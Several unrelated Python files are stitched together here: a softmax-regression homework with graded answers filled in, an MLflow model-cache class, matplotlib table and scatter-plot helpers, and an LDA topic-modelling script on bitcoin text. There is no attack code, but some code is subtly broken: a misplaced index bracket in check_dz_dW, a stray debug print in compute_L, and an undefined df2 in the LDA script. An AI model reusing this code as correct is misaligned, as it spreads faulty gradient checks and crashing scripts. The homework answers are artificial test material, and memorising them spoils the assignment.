W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p).
b: the bias values of softmax regression, a float numpy matrix of shape c by 1.
---------- values ----------------------
z: the linear logits, a float numpy matrix of shape c by 1.
a: the softmax activations, a float numpy matrix of shape c by 1.
L: the multi-class cross entropy loss, a float scalar.
---------- partial gradients ----------------------
dL_da: the partial gradients of the loss function L w.r.t. the activations a, a float numpy matrix of shape c by 1.
The i-th element dL_da[i] represents the partial gradient of the loss function L w.r.t. the i-th activation a[i]: d_L / d_a[i].
da_dz: the partial gradient of the activations a w.r.t. the logits z, a float numpy matrix of shape (c by c).
The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The (i,j)-th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
dz_db: the partial gradient of the logits z w.r.t. the biases b, a float matrix of shape c by 1.
Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias b[i]: d_z[i] / d_b[i]
---------- partial gradients of parameters ------------------
dL_dW: the partial gradients of the loss function L w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The i,j-th element dL_dW[i,j] represents the partial gradient of the loss function L w.r.t. the i,j-th weight W[i,j]: d_L / d_W[i,j]
dL_db: the partial gradient of the loss function L w.r.t. the biases b, a float numpy matrix of shape c by 1.
The i-th element dL_db[i] represents the partial gradient of the loss function w.r.t. the i-th bias: d_L / d_b[i]
---------- training ----------------------
alpha: the step-size parameter of gradient descent, a float scalar.
n_epoch: the number of passes to go through the training dataset in order to train the model, an integer scalar.
'''
#-----------------------------------------------------------------
# Forward Pass
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def compute_z(x,W,b):
'''
Compute the linear logit values of a data instance. z = W x + b
Input:
x: the feature vector of a data instance, a float numpy matrix of shape p by 1. Here p is the number of features/dimensions.
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
Output:
z: the linear logits, a float numpy vector of shape c by 1.
Hint: you could solve this problem using 1 line of code.
'''
#########################################
## INSERT YOUR CODE HERE
z = np.dot(W, x) + b
#########################################
return z
#-----------------------------------------------------------------
def compute_a(z):
'''
Compute the softmax activations.
Input:
z: the logit values of softmax regression, a float numpy vector of shape c by 1. Here c is the number of classes
Output:
a: the softmax activations, a float numpy vector of shape c by 1.
'''
#########################################
## INSERT YOUR CODE HERE
z_ = z - np.max(z)
z_[z_<-100] = -100
e_x = np.exp(z_)
a = e_x / e_x.sum(axis=0)
#########################################
return a
#-----------------------------------------------------------------
def compute_L(a,y):
'''
Compute multi-class cross entropy, which is the loss function of softmax regression.
Input:
a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
Output:
L: the loss value of softmax regression, a float scalar.
'''
#########################################
## INSERT YOUR CODE HERE
print(a)
c = np.shape(a)[0]
for i in range(c):
if a[y] == 0:
log_likelihood = 1e7
else:
log_likelihood = -np.log(a[y])
L = np.sum(log_likelihood)
L = float(L)
#########################################
return L
#-----------------------------------------------------------------
def forward(x,y,W,b):
'''
Forward pass: given an instance in the training data, compute the logits z, activations a and multi-class cross entropy L on the instance.
Input:
x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
y: the label of a training instance, an integer scalar value. The values can be 0 or 1.
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
Output:
z: the logit values of softmax regression, a float numpy vector of shape c by 1. Here c is the number of classes
a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
L: the loss value of softmax regression, a float scalar.
'''
#########################################
## INSERT YOUR CODE HERE
z = compute_z(x,W,b)
a = compute_a(z)
L = compute_L(a,y)
#########################################
return z, a, L
#-----------------------------------------------------------------
# Compute Local Gradients
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def compute_dL_da(a, y):
'''
Compute local gradient of the multi-class cross-entropy loss function w.r.t. the activations.
Input:
a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
Output:
dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
The i-th element dL_da[i] represents the partial gradient of the loss function w.r.t. the i-th activation a[i]: d_L / d_a[i].
'''
#########################################
## INSERT YOUR CODE HERE
c = np.shape(a)[0]
dL_da = a.copy()
for i in range(c):
if i == y:
if dL_da[i] == 0:
dL_da[i] = -1e7
else:
dL_da[i] = -(1/dL_da[i])
else:
dL_da[i] = 0
#########################################
return dL_da
#-----------------------------------------------------------------
def compute_da_dz(a):
'''
Compute local gradient of the softmax activations a w.r.t. the logits z.
Input:
a: the activation values of softmax function, a numpy float vector of shape c by 1. Here c is the number of classes.
Output:
da_dz: the local gradient of the activations a w.r.t. the logits z, a float numpy matrix of shape (c by c).
The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
Hint: you could solve this problem using 4 or 5 lines of code.
(3 points)
'''
#########################################
## INSERT YOUR CODE HERE
c = np.shape(a)[0]
da_dz = np.ones((c,c))
for i in range(c):
for j in range(c):
if i == j:
da_dz[i][j] = a[i]*(1-a[i])
else:
da_dz[i][j] = -a[i]*a[j]
da_dz = np.asmatrix(da_dz)
#########################################
return da_dz
#-----------------------------------------------------------------
def compute_dz_dW(x,c):
'''
Compute local gradient of the logits function z w.r.t. the weights W.
Input:
x: the feature vector of a data instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
c: the number of classes, an integer.
Output:
dz_dW: the partial gradient of logits z w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
The (i,j)-th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
Hint: the partial gradients only depend on the input x and the number of classes
'''
#########################################
## INSERT YOUR CODE HERE
p = np.shape(x)[0]
dz_dW = np.ones((c,p))
for i in range(c):
for j in range(p):
dz_dW[i][j] = x[j]
dz_dW = np.asmatrix(dz_dW)
#########################################
return dz_dW
#-----------------------------------------------------------------
def compute_dz_db(c):
'''
Compute local gradient of the logits function z w.r.t. the biases b.
Input:
c: the number of classes, an integer.
Output:
dz_db: the partial gradient of the logits z w.r.t. the biases b, a float vector of shape c by 1.
Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias b[i]: d_z[i] / d_b[i]
Hint: you could solve this problem using 1 line of code.
'''
#########################################
## INSERT YOUR CODE HERE
dz_db = np.asmatrix(np.ones(c)).T
#########################################
return dz_db
#-----------------------------------------------------------------
# Back Propagation
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def backward(x,y,a):
'''
Back Propagation: given an instance in the training data, compute the local gradients of the logits z, activations a, weights W and biases b on the instance.
Input:
x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
Output:
dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
The i-th element dL_da[i] represents the partial gradient of the loss function L w.r.t. the i-th activation a[i]: d_L / d_a[i].
da_dz: the local gradient of the activation w.r.t. the logits z, a float numpy matrix of shape (c by c).
The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The i,j -th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
dz_db: the partial gradient of the logits z w.r.t. the biases b, a float vector of shape c by 1.
Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias: d_z[i] / d_b[i]
'''
#########################################
## INSERT YOUR CODE HERE
c = np.shape(a)[0]
dL_da = compute_dL_da(a, y)
da_dz = compute_da_dz(a)
dz_dW = compute_dz_dW(x, c)
dz_db = compute_dz_db(c)
#########################################
return dL_da, da_dz, dz_dW, dz_db
#-----------------------------------------------------------------
def compute_dL_dz(dL_da,da_dz):
'''
Given the local gradients, compute the gradient of the loss function L w.r.t. the logits z using chain rule.
Input:
dL_da: the local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
The i-th element dL_da[i] represents the partial gradient of the loss function L w.r.t. the i-th activation a[i]: d_L / d_a[i].
da_dz: the local gradient of the activation w.r.t. the logits z, a float numpy matrix of shape (c by c).
The (i,j)-th element of da_dz represents the partial gradient ( d_a[i] / d_z[j] )
Output:
dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
The i-th element dL_dz[i] represents the partial gradient of the loss function L w.r.t. the i-th logit z[i]: d_L / d_z[i].
'''
#########################################
## INSERT YOUR CODE HERE
c = np.shape(dL_da)[0]
dL_dz = np.ones(c)
v = np.vstack(dL_da)
dL_dz = np.dot(da_dz, v)
dL_dz = np.asmatrix(dL_dz)
#########################################
return dL_dz
#-----------------------------------------------------------------
def compute_dL_dW(dL_dz,dz_dW):
'''
Given the local gradients, compute the gradient of the loss function L w.r.t. the weights W using chain rule.
Input:
dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
The i-th element dL_dz[i] represents the partial gradient of the loss function L w.r.t. the i-th logit z[i]: d_L / d_z[i].
dz_dW: the partial gradient of logits z w.r.t. the weight matrix W, a numpy float matrix of shape (c by p).
The i,j -th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
Output:
dL_dW: the global gradient of the loss function w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
Here c is the number of classes.
The i,j-th element dL_dW[i,j] represents the partial gradient of the loss function L w.r.t. the i,j-th weight W[i,j]: d_L / d_W[i,j]
Hint: you could solve this problem using 2 lines of code
'''
#########################################
## INSERT YOUR CODE HERE
dL_dW = np.multiply(dz_dW,dL_dz)
#########################################
return dL_dW
#-----------------------------------------------------------------
def compute_dL_db(dL_dz,dz_db):
'''
Given the local gradients, compute the gradient of the loss function L w.r.t. the biases b using chain rule.
Input:
dL_dz: the gradient of the loss function L w.r.t. the logits z, a numpy float vector of shape c by 1.
The i-th element dL_dz[i] represents the partial gradient of the loss function L w.r.t. the i-th logit z[i]: d_L / d_z[i].
dz_db: the local gradient of the logits z w.r.t. the biases b, a float numpy vector of shape c by 1.
The i-th element dz_db[i] represents the partial gradient ( d_z[i] / d_b[i] )
Output:
dL_db: the global gradient of the loss function L w.r.t. the biases b, a float numpy vector of shape c by 1.
The i-th element dL_db[i] represents the partial gradient of the loss function w.r.t. the i-th bias: d_L / d_b[i]
Hint: you could solve this problem using 1 line of code in the block.
'''
#########################################
## INSERT YOUR CODE HERE
dL_db = np.multiply(dz_db,dL_dz)
#########################################
return dL_db
#-----------------------------------------------------------------
# gradient descent
#-----------------------------------------------------------------
#--------------------------
def update_W(W, dL_dW, alpha=0.001):
'''
Update the weights W using gradient descent.
Input:
W: the current weight matrix, a float numpy matrix of shape (c by p). Here c is the number of classes.
alpha: the step-size parameter of gradient descent, a float scalar.
dL_dW: the global gradient of the loss function w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
The i,j-th element dL_dW[i,j] represents the partial gradient of the loss function L w.r.t. the i,j-th weight W[i,j]: d_L / d_W[i,j]
Output:
W: the updated weight matrix, a numpy float matrix of shape (c by p).
Hint: you could solve this problem using 1 line of code
'''
#########################################
## INSERT YOUR CODE HERE
W = W - dL_dW * alpha
#########################################
return W
#--------------------------
def update_b(b, dL_db, alpha=0.001):
'''
Update the biases b using gradient descent.
Input:
b: the current bias values, a float numpy vector of shape c by 1.
dL_db: the global gradient of the loss function L w.r.t. the biases b, a float numpy vector of shape c by 1.
The i-th element dL_db[i] represents the partial gradient of the loss function w.r.t. the i-th bias: d_L / d_b[i]
alpha: the step-size parameter of gradient descent, a float scalar.
Output:
b: the updated of bias vector, a float numpy vector of shape c by 1.
Hint: you could solve this problem using 1 lines of code
'''
#########################################
## INSERT YOUR CODE HERE
b = b - dL_db * alpha
#########################################
return b
#--------------------------
# train
def train(X, Y, alpha=0.01, n_epoch=100):
'''
Given a training dataset, train the softmax regression model by iteratively updating the weights W and biases b using the gradients computed over each data instance.
Input:
X: the feature matrix of training instances, a float numpy matrix of shape (n by p). Here n is the number of data instance in the training set, p is the number of features/dimensions.
Y: the labels of training instance, a numpy integer numpy array of length n. The values can be 0 or 1.
alpha: the step-size parameter of gradient ascent, a float scalar.
n_epoch: the number of passes to go through the training set, an integer scalar.
Output:
W: the weight matrix trained on the training set, a numpy float matrix of shape (c by p).
b: the bias, a float numpy vector of shape c by 1.
'''
# number of features
p = X.shape[1]
# number of classes
c = max(Y) + 1
# randomly initialize W and b
W = np.asmatrix(np.random.rand(c,p))
b= np.asmatrix(np.random.rand(c,1))
for _ in range(n_epoch):
# go through each training instance
for x,y in zip(X,Y):
x = x.T # convert to column vector
#########################################
## INSERT YOUR CODE HERE
# Forward pass: compute the logits, softmax and cross_entropy
z = compute_z(x,W,b)
a = compute_a(z)
L = compute_L(a,y)
# Back Propagation: compute local gradients of cross_entropy, softmax and logits
dL_da = compute_dL_da(a, y)
da_dz = compute_da_dz(a)
dz_dW = compute_dz_dW(x,c)
dz_db = compute_dz_db(c)
# compute the global gradients using chain rule
dL_dz = compute_dL_dz(dL_da,da_dz)
dL_dW = compute_dL_dW(dL_dz,dz_dW)
dL_db = compute_dL_db(dL_dz,dz_db)
# update the paramters using gradient descent
W = update_W(W, dL_dW, alpha)
b = update_b(b, dL_db, alpha)
#########################################
return W, b
#--------------------------
def predict(Xtest, W, b):
'''
Predict the labels of the instances in a test dataset using softmax regression.
Input:
Xtest: the feature matrix of testing instances, a float numpy matrix of shape (n_test by p). Here n_test is the number of data instance in the test set, p is the number of features/dimensions.
W: the weight vector of the logistic model, a float numpy matrix of shape (c by p).
b: the bias values of the softmax regression model, a float vector of shape c by 1.
Output:
Y: the predicted labels of test data, an integer numpy array of length ntest Each element can be 0, 1, ..., or (c-1)
P: the predicted probabilities of test data to be in different classes, a float numpy matrix of shape (ntest,c). Each (i,j) element is between 0 and 1, indicating the probability of the i-th instance having the j-th class label.
(2 points)
'''
n = Xtest.shape[0]
c = W.shape[0]
Y = np.zeros(n) # initialize as all zeros
P = np.asmatrix(np.zeros((n,c)))
for i, x in enumerate(Xtest):
x = x.T # convert to column vector
#########################################
## INSERT YOUR CODE HERE
z = compute_z(x, W, b)
a = compute_a(z)
ele = 0
indexes = 0
for j in range(len(a)):
P[i, j] = a[j, 0]
if a[j] > ele:
indexes = j
ele = a[j]
Y[i] = indexes
#########################################
return Y, P
#-----------------------------------------------------------------
# gradient checking
#-----------------------------------------------------------------
#-----------------------------------------------------------------
def check_da_dz(z, delta=1e-7):
'''
Compute local gradient of the softmax function using gradient checking.
Input:
z: the logit values of softmax regression, a float numpy vector of shape c by 1. Here c is the number of classes
delta: a small number for gradient check, a float scalar.
Output:
da_dz: the approximated local gradient of the activations w.r.t. the logits, a float numpy matrix of shape (c by c).
The (i,j)-th element represents the partial gradient ( d a[i] / d z[j] )
'''
c = z.shape[0] # number of classes
da_dz = np.asmatrix(np.zeros((c,c)))
for i in range(c):
for j in range(c):
d = np.asmatrix(np.zeros((c,1)))
d[j] = delta
da_dz[i,j] = (compute_a(z+d)[i,0] - compute_a(z)[i,0]) / delta
return da_dz
#-----------------------------------------------------------------
def check_dL_da(a, y, delta=1e-7):
'''
Compute local gradient of the multi-class cross-entropy function w.r.t. the activations using gradient checking.
Input:
a: the activations of a training instance, a float numpy vector of shape c by 1. Here c is the number of classes.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
delta: a small number for gradient check, a float scalar.
Output:
dL_da: the approximated local gradients of the loss function w.r.t. the activations, a float numpy vector of shape c by 1.
'''
c = a.shape[0] # number of classes
dL_da = np.asmatrix(np.zeros((c,1))) # initialize the vector as all zeros
for i in range(c):
d = np.asmatrix(np.zeros((c,1)))
d[i] = delta
dL_da[i] = ( compute_L(a+d,y)
- compute_L(a,y)) / delta
return dL_da
#--------------------------
def check_dz_dW(x, W, b, delta=1e-7):
'''
compute the local gradient of the logit function using gradient check.
Input:
x: the feature vector of a data instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
delta: a small number for gradient check, a float scalar.
Output:
dz_dW: the approximated local gradient of the logits w.r.t. the weight matrix computed by gradient checking, a numpy float matrix of shape (c by p).
The i,j -th element of dz_dW represents the partial gradient of the i-th logit (z[i]) w.r.t. the weight W[i,j]: d_z[i] / d_W[i,j]
'''
c,p = W.shape # number of classes and features
dz_dW = np.asmatrix(np.zeros((c,p)))
for i in range(c):
for j in range(p):
d = np.asmatrix(np.zeros((c,p)))
d[i,j] = delta
dz_dW[i,j] = (compute_z(x,W+d, b)[i,0] - compute_z(x, W, b))[i,0] / delta
return dz_dW
#--------------------------
def check_dz_db(x, W, b, delta=1e-7):
'''
compute the local gradient of the logit function using gradient check.
Input:
x: the feature vector of a data instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
delta: a small number for gradient check, a float scalar.
Output:
dz_db: the approximated local gradient of the logits w.r.t. the biases using gradient check, a float vector of shape c by 1.
Each element dz_db[i] represents the partial gradient of the i-th logit z[i] w.r.t. the i-th bias: d_z[i] / d_b[i]
'''
c,p = W.shape # number of classes and features
dz_db = np.asmatrix(np.zeros((c,1)))
for i in range(c):
d = np.asmatrix(np.zeros((c,1)))
d[i] = delta
dz_db[i] = (compute_z(x,W, b+d)[i,0] - compute_z(x, W, b)[i,0]) / delta
return dz_db
#-----------------------------------------------------------------
def check_dL_dW(x,y,W,b,delta=1e-7):
'''
Compute the gradient of the loss function w.r.t. the weights W using gradient checking.
Input:
x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
delta: a small number for gradient check, a float scalar.
Output:
dL_dW: the approximated gradients of the loss function w.r.t. the weight matrix, a numpy float matrix of shape (c by p).
'''
c, p = W.shape
dL_dW = np.asmatrix(np.zeros((c,p)))
for i in range(c):
for j in range(p):
d = np.asmatrix(np.zeros((c,p)))
d[i,j] = delta
dL_dW[i,j] = ( forward(x,y,W+d,b)[-1] - forward(x,y,W,b)[-1] ) / delta
return dL_dW
#-----------------------------------------------------------------
def check_dL_db(x,y,W,b,delta=1e-7):
'''
Compute the gradient of the loss function w.r.t. the bias b using gradient checking.
Input:
x: the feature vector of a training instance, a float numpy vector of shape p by 1. Here p is the number of features/dimensions.
y: the label of a training instance, an integer scalar value. The values can be 0,1,2, ..., or (c-1).
W: the weight matrix of softmax regression, a float numpy matrix of shape (c by p). Here c is the number of classes.
b: the bias values of softmax regression, a float numpy vector of shape c by 1.
delta: a small number for gradient check, a float scalar.
Output:
dL_db: the approxmiated gradients of the loss function w.r.t. the biases, a float vector of shape c by 1.
'''
c, p = W.shape
dL_db = np.asmatrix(np.zeros((c,1)))
for i in range(c):
d = np.asmatrix(np.zeros((c,1)))
d[i] = delta
dL_db[i] = ( forward(x,y,W,b+d)[-1] - forward(x,y,W,b)[-1] ) / delta
return dL_db
|
import datetime
import logging
import os
from functools import lru_cache
from pathlib import Path
import mlflow
import requests
from cd4ml.model_utils import load_deployed_model_from_local_file
from cd4ml.problems import list_available_scenarios
class ModelCache:
def __init__(self, cache_location=Path("mlflow_cache")):
self.logger = logging.getLogger(__name__)
self.known_problems = list_available_scenarios()
self.columns_of_interest = {
'run_id': 'run_id',
'tags.BuildNumber': 'build_number',
'tags.mlflow.runName': 'run_number',
'end_time': 'time',
'params.MLPipelineParamsName': 'ml_pipeline_params_name',
'params.FeatureSetName': 'feature_set_name',
'params.AlgorithmName': 'algorithm_name',
'params.AlgorithmParamsName': 'algorithm_params_name',
'tags.DidPassAcceptanceTest': 'passed_acceptance_test'
}
self.base_model_directory = cache_location
mlflow.set_tracking_uri(os.environ["MLFLOW_TRACKING_URL"])
def _get_id_for_latest_model(self, all_models_for_scenario):
possible_deployable_models = [row for row in all_models_for_scenario
if self.is_latest_deployable_model(row)]
if len(possible_deployable_models) == 0:
return None
last_deployment_model = sorted(possible_deployable_models,
key=lambda row: datetime.datetime.strptime(row['time'], "%c"),
reverse=True)
return last_deployment_model[0]['run_id']
def get_loaded_model_for_scenario_and_run_id(self, scenario, run_id):
if run_id == "latest":
all_models_for_scenario = self.list_available_models_from_ml_flow().get(scenario)
if all_models_for_scenario is None:
return None
latest_item = [item for item in all_models_for_scenario if item['is_latest']]
if len(latest_item) == 0:
return None
return self.get_loaded_model_for_scenario_and_run_id(scenario, latest_item[0]['run_id'])
model_path = Path(self.base_model_directory, scenario, run_id, "full_model.pkl")
if not model_path.exists():
self.download_and_save_from_ml_flow(model_path, run_id)
return self.read_model(model_path)
@lru_cache(maxsize=64)
def read_model(self, model_path):
return load_deployed_model_from_local_file(model_path)
def list_available_models_from_ml_flow(self):
returning_dictionary = dict()
for scenario in self.known_problems:
experiment = mlflow.get_experiment_by_name(scenario)
if experiment is None:
continue
runs = mlflow.search_runs(experiment_ids=experiment.experiment_id)
dataframe_with_columns_of_interest = runs[list(self.columns_of_interest.keys())]
dataframe_with_columns_renamed = dataframe_with_columns_of_interest.rename(columns=self.columns_of_interest)
dataframe_with_columns_renamed['time'] = dataframe_with_columns_renamed['time'].dt.strftime("%c")
list_of_dictionaries = dataframe_with_columns_renamed.to_dict("records")
id_of_latest = self._get_id_for_latest_model(list_of_dictionaries)
for d in list_of_dictionaries:
d['is_latest'] = d['run_id'] == id_of_latest
returning_dictionary[scenario] = list_of_dictionaries
return returning_dictionary
@staticmethod
def download_and_save_from_ml_flow(path, run_id):
path.parent.mkdir(parents=True, exist_ok=True)
results = requests.get("{}/get-artifact?path=full_model.pkl&run_uuid={}"
.format(mlflow.get_tracking_uri(), run_id))
with open(path, "wb") as f:
f.write(results.content)
@staticmethod
def is_latest_deployable_model(row):
return row['ml_pipeline_params_name'] == 'default' and \
row['feature_set_name'] == 'default' and \
row['algorithm_name'] == 'default' and \
row['algorithm_params_name'] == 'default' and \
row['passed_acceptance_test'] == 'yes'
|
<gh_stars>1-10
from matplotlib import pyplot as plt
import pandas as pd
import re
import numpy as np
def scplot(fig, dat, dep, coef):
"""
Plots scatter plot with regression line
Inputs:
dat (Pandas Series): data structure containing data about the best policy
dep (Pandas Series): data structure containing data about outcome of interest
coef (Pandas DataFrame): output from basic_regression.run_regression()
Outputs:
(Figure) The plotted model
"""
ax = fig.add_subplot(111)
ax.plot(dat, dep, ".", color = "b")
ax.set_xlabel(dat.name)
ax.set_ylabel(dep.name)
ax.plot(dat, coef.loc[dat.name, "values"]*dat + coef.loc["Intercept", "values"], '-')
return ax
def scplot_firstdraft(dat, dep, coef):
"""
Plots scatter plot with regression line
Inputs:
dat (Pandas Series): data structure containing data about the best policy
dep (Pandas Series): data structure containing data about outcome of interest
coef (Pandas DataFrame): output from basic_regression.run_regression()
Outputs:
(Figure) The plotted model
"""
#series containing predicted values for outcome
y_pred = dat.apply(lambda x: x * coef.loc[dat.name])
#scatterplot with regression line
plt.plot(dat, y_pred)
plt.scatter(dat, dep)
plt.xlabel(dat.name)
plt.ylabel(dep.name)
plt.title("{a} vs. {b}".format(a = dat.name, b = dep.name))
plt.savefig('test')
def dat_df(dat, title = None, color = "palegreen"):
"""
Takes in Pandas DataFrame/Series and returns matplotlib table object
Inputs:
dat (Pandas DataFrame or Series): Data to represent as a table
title (str): a string representing the title of the figure. Default is None
color (str): a string representing a color for the row and column cells.
Default is pale green
Outputs:
a matplotlib Table object representing the dataframe
"""
fig, ax = plt.subplots()
ax.set_axis_off()
dat = dat.round(2)
dat = abbrev_names(dat)
if len(dat.shape) > 1: #dataframe
table = pd.plotting.table(ax, dat, rowColours = [color] * dat.shape[0],
colColours = [color] * dat.shape[1],
cellLoc ='center', loc ='upper center')
else: #series
table = pd.plotting.table(ax, dat, rowColours = [color] * dat.shape[0],
colColours = [color], cellLoc ='center',
loc ='upper center')
#may also customize colors by column/row but might not be aesthetic
table.auto_set_font_size(False)
table.set_fontsize(11)
table.auto_set_column_width(col=list(range(len(dat.columns))))
if title:
fig.suptitle(title)
return fig
#should be noted that row labels default to the indices of the dataframe,
#which would be states in the policy/outcome dfs. For the df with the
#linear model coefficients, may want to add a condition/argument
#to remove them, since the row label would just be an integer index.
def abbrev_names(dat):
'''
Abbreviates names in a dataframe
'''
abbrev_columns = {}
abbrev_index = {}
for col in dat.columns:
if len(col) > 20:
abbrev_columns[col] = col[:round(len(col) / 8)] + "...(" + ".".join(x[0] for x in re.findall("\((.+)\)", col)[-1].split()) + ")"
for index in dat.index:
if len(index) > 20:
abbrev_index[index] = index[:round(len(index) / 8)] + "...(" + ".".join(x[0] for x in re.findall("\((.+)\)", index)[-1].split()) + ")"
dat = dat.rename(columns=abbrev_columns, index=abbrev_index)
return dat
|
<reponame>jasperschroeder/BigDataClass
###############################################################################
# title: 02-lda.py
# created on: May 15, 2021
# summary: lda, outputs topic weights in a df
###############################################################################
import pandas as pd
import numpy as np
import string
import spacy.cli
import matplotlib.pyplot as plt
import pdtext
from pdtext.tf import word_count
import nltk
from nltk.stem.snowball import SnowballStemmer
nltk.download('punkt')
from nltk.tokenize import sent_tokenize
from nltk import word_tokenize
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from joblib import dump, load
df = pd.read_csv('nlp-data/clean_text_df.csv', index_col = 0)
# after cleaning some text is nan - was originally emojis perhaps
missing = df["text"].isnull()
#df = df.loc[~missing]
# stop words: english + bitcoin related + things we have found after cleaning
my_stop_words = text.ENGLISH_STOP_WORDS.union(["https", "www", "com", "bitcoin", "btc", "bitcoins",
"just","like", "wallet", "btc", "blockchain",
"crypto", "coinbase", "amp",
"im", "iv", "id", "ive", "ampxb"])
# example for paper
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
text_tokens = word_tokenize('your a grand old flag your a highfli flag and forev in peac may you wave')
tokens_without_sw = [word for word in text_tokens if not word in my_stop_words]
print(tokens_without_sw)
# get the most common words
vectorizer = CountVectorizer(lowercase=True,
max_df = 0.3,
stop_words=my_stop_words,
min_df=0.025)
# fit the CountVectorizer to the clean text
vectorizer.fit(df2['text'])
# get the vocabulary of the text
vocab = vectorizer.get_feature_names()
len(vocab) # 241
# save this for 02-lda-topics.py
dump(vocab,'vocab.joblib')
# term frequency
tf = vectorizer.transform(df['text'])
# Compute LDA Models
for cp in [3, 5, 8, 10, 15, 20]:
# LDA topic model
print('Fitting LDA Model for ncomp' + str(cp) + '!!!')
lda_model = LatentDirichletAllocation(n_components=cp,
max_iter=10,
evaluate_every=1,
random_state=420,
verbose=1)
# fit
lda_model.fit_transform(tf)
# Log Likelihood: Higher the better
#print("Log Likelihood: ", lda_model.score(tf))
# Log Likelihood: -26461197.1741212
# Perplexity: Lower the better. Perplexity = exp(-1. * log-likelihood per word)
#print("Perplexity: ", lda_model.perplexity(tf))
# Perplexity: 396.69211197749775
fname = 'lda-models/2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
dump(lda_model,fname)
###############################
# Plot Perplexity of LDA Models
###############################
# we know that perplexity decreases with the number of topics
# thus we use a rule-of-thumb for unsupervised learning: "elbow rule"
lst_perplexity = []
lst_loglik = []
# warning -- slow
for cp in [3, 5, 8, 10, 15, 20]:
fname = '2021-13-mai-lda-model-stemmed-ncomp-' + str(cp) + '.joblib'
lda_model = load(fname)
lst_loglik.append(lda_model.score(tf))
lst_perplexity.append(lda_model.perplexity(tf))
print(lst_perplexity)
# plot the number of compotents vs. perplexity
plt.plot([3, 5, 8, 10, 15, 20],
lst_perplexity,
'r-o')
plt.xlabel('Number of Topics')
plt.ylabel('Perplexity')
plt.title('LDA Model Perplexity by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-perplexity-plot.png')
# plot the number of compotents vs. perplexity, exclude 20
plt.plot([3, 5, 8, 10, 15],
lst_perplexity[0:len(lst_perplexity)-1],
'r-o')
plt.xlabel('Number of Topics')
plt.ylabel('Perplexity')
plt.title('LDA Model Perplexity by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-perplexity-plot-3to15.png')
plt.close()
# plot the number of components vs log-likelihood
plt.plot([3, 5, 8, 10, 15, 20],
lst_loglik,
'b-o')
plt.xlabel('Number of Topics')
plt.ylabel('Log Likelihood')
plt.title('LDA Model Log Likelihood by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-loglik-plot.png')
plt.close()
# plot the number of components vs log-likelihood
plt.plot([3, 5, 8, 10, 15],
lst_loglik[0:len(lst_loglik)-1],
'b-o')
plt.xlabel('Number of Topics')
plt.ylabel('Log Likelihood')
plt.title('LDA Model Log Likelihood by Number of Topics')
#plt.show()
plt.savefig('plots/2021-13-mai-loglik-plot-3to15.png')
plt.close()
########################
# select final LDA model
########################
# The "elbow" is at 10 components. However, we can further reduce dimensionality
